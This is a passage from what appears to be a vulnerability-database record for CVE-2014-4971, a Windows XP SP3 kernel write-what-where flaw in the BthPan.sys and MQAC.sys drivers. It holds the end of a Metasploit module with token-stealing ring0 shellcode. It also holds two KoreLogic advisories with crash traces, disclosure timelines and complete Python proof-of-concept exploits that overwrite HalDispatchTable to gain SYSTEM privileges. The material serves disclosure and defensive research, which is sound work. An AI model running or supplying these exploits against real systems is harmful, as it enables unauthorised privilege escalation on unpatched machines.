This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\r\n NtQueryIntervalProfile.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\r\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Windows XP SP3',\r\n {\r\n 'HaliQuerySystemInfo' => 0x16bba,\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ]\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\r\n [ 'OSVDB', '109387' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n\r\n def ring0_shellcode\r\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\r\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\r\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\r\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\r\n tokenswap << [session.sys.process.getpid].pack('V')\r\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\r\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\r\n end\r\n\r\n def fill_memory(proc, address, length, content)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\r\n\r\n unless proc.memory.writable?(address)\r\n vprint_error(\"Failed 
to allocate memory\")\r\n return nil\r\n end\r\n vprint_good(\"#{address} is now writable\")\r\n\r\n result = proc.memory.write(address, content)\r\n\r\n if result.nil?\r\n vprint_error(\"Failed to write contents to memory\")\r\n return nil\r\n end\r\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\r\n\r\n return address\r\n end\r\n\r\n def disclose_addresses(t)\r\n addresses = {}\r\n\r\n hal_dispatch_table = find_haldispatchtable\r\n return nil if hal_dispatch_table.nil?\r\n addresses['halDispatchTable'] = hal_dispatch_table\r\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\r\n\r\n vprint_status('Getting the hal.dll base address...')\r\n hal_info = find_sys_base('hal.dll')\r\n if hal_info.nil?\r\n vprint_error('Failed to disclose hal.dll base address')\r\n return nil\r\n end\r\n hal_base = hal_info[0]\r\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\r\n\r\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\r\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\r\n\r\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\r\n addresses\r\n end\r\n\r\n def check\r\n if sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n os = sysinfo[\"OS\"]\r\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n return Exploit::CheckCode::Safe unless handle\r\n\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Exploit::Failure::None, 'Session is already elevated')\r\n end\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available 
on this system\")\r\n end\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n if handle.nil?\r\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\r\n end\r\n\r\n my_target = targets[0]\r\n print_status(\"Disclosing the HalDispatchTable address...\")\r\n @addresses = disclose_addresses(my_target)\r\n if @addresses.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\r\n else\r\n print_good(\"Address successfully disclosed.\")\r\n end\r\n\r\n print_status(\"Storing the shellcode in memory...\")\r\n this_proc = session.sys.process.open\r\n kernel_shell = ring0_shellcode\r\n kernel_shell_address = 0x1\r\n\r\n buf = \"\\x90\" * 0x6000\r\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\r\n buf[0x5000, kernel_shell.length] = kernel_shell\r\n\r\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\r\n if result.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\r\n end\r\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\r\n\r\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\r\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\r\n\r\n print_status(\"Checking privileges after exploitation...\")\r\n\r\n unless is_system?\r\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\r\n end\r\n print_good(\"Privilege escalation successful!\")\r\n\r\n p = payload.encoded\r\n 
print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\r\n unless execute_shellcode(p)\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34982/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "\r\n\r\nTitle: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. 
In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. 
To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. 
KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an "up-platform"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = 
c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n\r\n handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print "[+] Handle \\\\.\\MQAC @ %s" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\x50\x00\x00\x00"+"\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print "[+] HalDispatchTable+0x4 overwritten"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. 
We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\r\n", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:DOC:30942", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30942", "title": "KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "BthPan.sys and MQAC.sys privilege escalation.", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:VULN:13881", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13881", "title": "Microsoft Windows XP privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "\r\n\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. 
Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. 
In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. 
InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. 
Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any "up-platform" products. Says they\r\n are investigating embedded platforms. 
Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. 
Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack) \r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint "[!] 
Could not open handle to BthPan"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. 
